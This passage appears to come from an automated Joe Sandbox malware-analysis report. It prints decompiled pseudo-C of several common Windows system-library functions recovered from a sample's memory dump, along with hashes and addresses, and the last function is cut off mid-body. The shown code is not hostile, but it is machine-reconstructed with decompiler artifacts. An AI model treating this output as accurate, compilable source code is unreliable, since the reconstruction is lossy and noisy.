                                                    • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                    • Instruction Fuzzy Hash: DD718F71A00209EFCB15DFA9C984AEEFBB9FF88714F144169E505E7250EB34EA41CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017B52A5 Relevance: .2, Instructions: 161COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 78%
                                                    			E017B52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E017CEEF0(0x18a79a0);
					_t104 =  *0x18a8210; // 0x1282c40
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E017CEB70(_t93, 0x18a79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E017F9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E017CEEF0(0x18a79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E017CEB70(0, 0x18a79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x1282c4d
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E017EF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E017CEEF0(0x18a79a0);
									__eflags =  *0x18a8210 - _t104; // 0x1282c40
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x18a8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E01834888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E017CEB70(_t95, 0x18a79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E017F95D0();
											L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E017F95D0();
											L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E017CEB70(_t93, 0x18a79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E017F95D0();
										L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E017F95D0();
										L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E017EF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                    0x017b52a5
                                                    0x017b52ad
                                                    0x017b52b0
                                                    0x017b52b3
                                                    0x017b52b7
                                                    0x017b52ba
                                                    0x017b52bf
                                                    0x017b52c4
                                                    0x017b52cc
                                                    0x00000000
                                                    0x00000000
                                                    0x017b52ce
                                                    0x017b52d9
                                                    0x017b52dd
                                                    0x017b52e7
                                                    0x017b52f7
                                                    0x017b52f9
                                                    0x017b52fd
                                                    0x01810dcf
                                                    0x01810dd5
                                                    0x01810dd6
                                                    0x01810dd7
                                                    0x01810dd8
                                                    0x01810dd9
                                                    0x01810dde
                                                    0x01810ddf
                                                    0x01810de0
                                                    0x01810de1
                                                    0x01810de2
                                                    0x01810de5
                                                    0x01810dea
                                                    0x01810dec
                                                    0x01810f60
                                                    0x01810f64
                                                    0x01810f70
                                                    0x01810f76
                                                    0x01810f79
                                                    0x01810f79
                                                    0x00000000
                                                    0x01810f64
                                                    0x01810df2
                                                    0x01810df7
                                                    0x01810e04
                                                    0x01810e0d
                                                    0x01810e0d
                                                    0x01810e10
                                                    0x01810e1a
                                                    0x01810e1c
                                                    0x01810e4c
                                                    0x01810e52
                                                    0x01810e61
                                                    0x01810e67
                                                    0x01810e6b
                                                    0x01810e70
                                                    0x01810e76
                                                    0x01810ed7
                                                    0x01810edc
                                                    0x01810ee0
                                                    0x01810ee6
                                                    0x01810eea
                                                    0x01810eed
                                                    0x01810ef0
                                                    0x01810ef3
                                                    0x01810ef6
                                                    0x01810ef9
                                                    0x01810efe
                                                    0x01810f01
                                                    0x01810f01
                                                    0x01810f0b
                                                    0x01810f12
                                                    0x01810f16
                                                    0x01810f18
                                                    0x01810f1b
                                                    0x01810f2c
                                                    0x01810f31
                                                    0x01810f31
                                                    0x01810f35
                                                    0x01810f39
                                                    0x01810f3a
                                                    0x01810f3c
                                                    0x01810f3f
                                                    0x01810f50
                                                    0x01810f55
                                                    0x01810f55
                                                    0x01810f59
                                                    0x017b52eb
                                                    0x017b52f1
                                                    0x017b52f1
                                                    0x01810e7d
                                                    0x01810e84
                                                    0x01810e88
                                                    0x01810e8a
                                                    0x01810e8d
                                                    0x01810e9e
                                                    0x01810ea3
                                                    0x01810ea3
                                                    0x01810ea7
                                                    0x01810eaf
                                                    0x01810eb3
                                                    0x01810eb9
                                                    0x01810eb9
                                                    0x01810ebc
                                                    0x01810ecd
                                                    0x01810ecd
                                                    0x00000000
                                                    0x01810eb3
                                                    0x01810e21
                                                    0x01810e2b
                                                    0x01810e2f
                                                    0x01810e30
                                                    0x01810e3a
                                                    0x01810e3f
                                                    0x01810e41
                                                    0x00000000
                                                    0x00000000
                                                    0x01810e47
                                                    0x00000000
                                                    0x01810e47
                                                    0x01810df9
                                                    0x01810dfe
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x01810dfe
                                                    0x017b5303
                                                    0x017b5307
                                                    0x00000000
                                                    0x017b5309
                                                    0x00000000
                                                    0x017b5309
                                                    0x017b5307
                                                    0x017b52e9
                                                    0x017b52e9
                                                    0x00000000
                                                    0x017b52e9
                                                    0x017b530e
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c0d8083a25fc3378229222c317f554a66408f66fda21124aba4d1d7b75dee76e
                                                    • Instruction ID: e8662c7960496ec1a9fa44db2b63b04591b7af460bbdabc29b42f88db495d5a9
                                                    • Opcode Fuzzy Hash: c0d8083a25fc3378229222c317f554a66408f66fda21124aba4d1d7b75dee76e
                                                    • Instruction Fuzzy Hash: A451FB71109342ABE321DF28C889B67FBE8FF54710F14091EF59583651E774E944CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017E2AE4 Relevance: .2, Instructions: 159COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E017E2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x18a8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x18a8208; // 0x18a8207
				_t8 = _t57 + 0x18a8208; // 0x18a8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x18a8450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x18a821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x18a6d5c; // 0x7f440654
							_t72 =  *0x18a6d5c; // 0x7f440654
							_t75 =  *0x18a6d5c; // 0x7f440654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x18a6d5c; // 0x7f440654
							_t84 =  *0x18a6d5c; // 0x7f440654
							_t87 =  *0x18a6d5c; // 0x7f440654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E017FF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                    0x017e2ae4
                                                    0x017e2aec
                                                    0x017e2aef
                                                    0x017e2af4
                                                    0x017e2af7
                                                    0x017e2afd
                                                    0x017e2b92
                                                    0x017e2b92
                                                    0x017e2b97
                                                    0x017e2b9c
                                                    0x017e2b9c
                                                    0x017e2b03
                                                    0x017e2b06
                                                    0x017e2b09
                                                    0x017e2b09
                                                    0x017e2b0f
                                                    0x017e2b15
                                                    0x017e2b15
                                                    0x017e2b1b
                                                    0x017e2b1e
                                                    0x017e2b21
                                                    0x017e2b26
                                                    0x017e2b29
                                                    0x017e2b81
                                                    0x017e2b84
                                                    0x017e2c0e
                                                    0x017e2c15
                                                    0x017e2c24
                                                    0x017e2c24
                                                    0x017e2b8a
                                                    0x017e2b8a
                                                    0x017e2b8a
                                                    0x017e2b8a
                                                    0x017e2b90
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017e2b4a
                                                    0x017e2b4a
                                                    0x017e2b4d
                                                    0x017e2b53
                                                    0x00000000
                                                    0x00000000
                                                    0x017e2b55
                                                    0x017e2b58
                                                    0x017e2bb7
                                                    0x01825d1b
                                                    0x01825d37
                                                    0x01825d47
                                                    0x01825d53
                                                    0x017e2bbd
                                                    0x017e2bbd
                                                    0x017e2bbd
                                                    0x017e2bb7
                                                    0x017e2b5d
                                                    0x017e2c2f
                                                    0x01825d5b
                                                    0x01825d77
                                                    0x01825d87
                                                    0x01825d93
                                                    0x017e2c35
                                                    0x017e2c35
                                                    0x017e2c35
                                                    0x017e2c2f
                                                    0x017e2b65
                                                    0x017e2b9f
                                                    0x017e2ba2
                                                    0x017e2b67
                                                    0x017e2b67
                                                    0x017e2b69
                                                    0x017e2b6b
                                                    0x017e2b6e
                                                    0x017e2bc9
                                                    0x017e2bcc
                                                    0x017e2bcf
                                                    0x017e2bd4
                                                    0x017e2bd6
                                                    0x017e2bd6
                                                    0x017e2bdb
                                                    0x017e2c02
                                                    0x017e2c05
                                                    0x017e2c07
                                                    0x00000000
                                                    0x017e2c07
                                                    0x017e2be0
                                                    0x017e2c00
                                                    0x017e2c3f
                                                    0x017e2c3f
                                                    0x00000000
                                                    0x017e2c00
                                                    0x017e2be5
                                                    0x017e2be7
                                                    0x017e2bec
                                                    0x017e2bf4
                                                    0x017e2bf6
                                                    0x00000000
                                                    0x017e2bf6
                                                    0x017e2b70
                                                    0x017e2b76
                                                    0x017e2b2b
                                                    0x017e2b2b
                                                    0x017e2b2d
                                                    0x017e2b2f
                                                    0x017e2b32
                                                    0x017e2b35
                                                    0x017e2b3a
                                                    0x00000000
                                                    0x017e2b40
                                                    0x017e2b43
                                                    0x017e2b45
                                                    0x017e2b47
                                                    0x017e2b4a
                                                    0x017e2b4d
                                                    0x017e2b53
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017e2b53
                                                    0x017e2b78
                                                    0x017e2b78
                                                    0x017e2b7b
                                                    0x017e2b7e
                                                    0x00000000
                                                    0x017e2b7e
                                                    0x017e2b76
                                                    0x017e2ba5
                                                    0x017e2ba5
                                                    0x017e2ba8
                                                    0x017e2bad
                                                    0x00000000
                                                    0x00000000
                                                    0x017e2baf
                                                    0x017e2baf
                                                    0x017e2bc2
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c42209b12c917cab826ac13a1455d5fdb7da85f2c45c9f8ac20178f57f70eb21
                                                    • Instruction ID: c0972476dbb148e879519026b30a72a43a37bd301367a026fae3cc9dbbd4e7be
                                                    • Opcode Fuzzy Hash: c42209b12c917cab826ac13a1455d5fdb7da85f2c45c9f8ac20178f57f70eb21
                                                    • Instruction Fuzzy Hash: B3518F76A001258FCB18CF1CC8989BDF7F5FB88700719855AE8569B366E734AA91CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0187AE44 Relevance: .2, Instructions: 152COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 86%
                                                    			E0187AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0187C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0187ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0187FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0187EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E017D7D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E01871608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E01881536(0x18a8ae4, (_t74 -  *0x18a8b04 >> 0x14) + (_t74 -  *0x18a8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0187C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0187A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0185CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0187ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                                                    0x0187ae44
                                                    0x0187ae4c
                                                    0x0187ae53
                                                    0x0187ae55
                                                    0x0187ae5c
                                                    0x0187ae64
                                                    0x0187ae68
                                                    0x0187ae75
                                                    0x0187ae75
                                                    0x0187ae78
                                                    0x0187ae7a
                                                    0x0187ae7c
                                                    0x0187ae7f
                                                    0x0187aea8
                                                    0x0187aeab
                                                    0x0187aead
                                                    0x00000000
                                                    0x00000000
                                                    0x0187aeb3
                                                    0x0187aeb8
                                                    0x0187aebb
                                                    0x0187aebd
                                                    0x00000000
                                                    0x0187ae81
                                                    0x0187ae88
                                                    0x0187ae8f
                                                    0x0187ae9b
                                                    0x0187ae96
                                                    0x0187ae96
                                                    0x0187ae96
                                                    0x0187aea0
                                                    0x0187aea3
                                                    0x0187aebf
                                                    0x0187aebf
                                                    0x0187aec3
                                                    0x0187aec9
                                                    0x0187af0d
                                                    0x0187af14
                                                    0x0187af3d
                                                    0x0187af3d
                                                    0x0187af41
                                                    0x0187af44
                                                    0x0187af67
                                                    0x0187af67
                                                    0x0187af6a
                                                    0x0187afca
                                                    0x0187afd1
                                                    0x00000000
                                                    0x0187afd1
                                                    0x0187af6c
                                                    0x0187af6d
                                                    0x0187af75
                                                    0x0187af7c
                                                    0x0187af7e
                                                    0x0187af80
                                                    0x0187af85
                                                    0x0187af87
                                                    0x0187af99
                                                    0x0187af89
                                                    0x0187af92
                                                    0x0187af92
                                                    0x0187af9e
                                                    0x0187afa1
                                                    0x0187afa3
                                                    0x0187afa9
                                                    0x0187afb0
                                                    0x0187afb2
                                                    0x0187afb4
                                                    0x0187afbc
                                                    0x0187afbc
                                                    0x0187afb4
                                                    0x0187afb0
                                                    0x00000000
                                                    0x0187afa1
                                                    0x0187af4f
                                                    0x0187af57
                                                    0x0187af5c
                                                    0x0187af5e
                                                    0x00000000
                                                    0x00000000
                                                    0x0187af60
                                                    0x0187af64
                                                    0x0187af64
                                                    0x00000000
                                                    0x0187af64
                                                    0x0187af1a
                                                    0x0187af25
                                                    0x00000000
                                                    0x00000000
                                                    0x0187af27
                                                    0x0187af28
                                                    0x0187af33
                                                    0x00000000
                                                    0x0187aed0
                                                    0x0187aed0
                                                    0x0187aed2
                                                    0x0187aee1
                                                    0x0187aee4
                                                    0x00000000
                                                    0x00000000
                                                    0x0187aee6
                                                    0x0187aeec
                                                    0x00000000
                                                    0x00000000
                                                    0x0187aefb
                                                    0x0187af07
                                                    0x0187afd3
                                                    0x0187afdb
                                                    0x0187afdb
                                                    0x00000000
                                                    0x0187af07
                                                    0x0187aed6
                                                    0x0187aed8
                                                    0x0187aedf
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0187aedf
                                                    0x0187aec9

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5ef78652501ca2b87e32e10b031651c88ce3139e99cd75cd6e5fad203019d229
                                                    • Instruction ID: c8f7929f942f11f7a1726d4236c4fbd2277af39000d7689b224c447e0c024a47
                                                    • Opcode Fuzzy Hash: 5ef78652501ca2b87e32e10b031651c88ce3139e99cd75cd6e5fad203019d229
                                                    • Instruction Fuzzy Hash: B241E6B17052119BE72EDA2DC894B3FBB99EF94720F0C4619F926C72D0DB34DA41C6A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017DDBE9 Relevance: .1, Instructions: 149COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 86%
                                                    			E017DDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E017BCC50(E017B4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E017D7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E01888ED6(_t102, _t98);
						}
						_t76 = _v44;
						E017D2280(_t58, _v44);
						E017DDD82(_v44, _t102, _t98);
						E017DB944(_t102, _v5);
						return E017CFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x18a8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x18a862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x18a8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x18a862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x187fb53
